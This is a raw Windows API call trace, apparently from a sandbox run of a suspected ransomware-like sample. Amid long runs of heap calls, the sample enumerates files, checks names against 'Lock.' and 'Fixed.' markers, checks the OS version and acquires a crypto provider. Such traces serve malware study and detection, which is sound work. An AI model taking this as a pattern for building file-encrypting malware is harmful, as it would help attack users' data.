RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0224.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0224.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0224.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0224.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0224.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0224.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0224.192] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0224.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab440 [0224.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0224.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0224.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0224.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0224.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0224.193] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0224.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0224.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0224.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865f58 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0224.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.197] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0224.197] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0224.197] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8cf1b0, dwReserved1=0x418f3e, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1bf8 [0224.197] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0224.198] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0224.198] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0224.198] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.198] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.198] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0224.198] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0224.198] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0224.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0224.199] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.199] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0224.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0224.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0224.199] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c550) returned 1 [0224.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 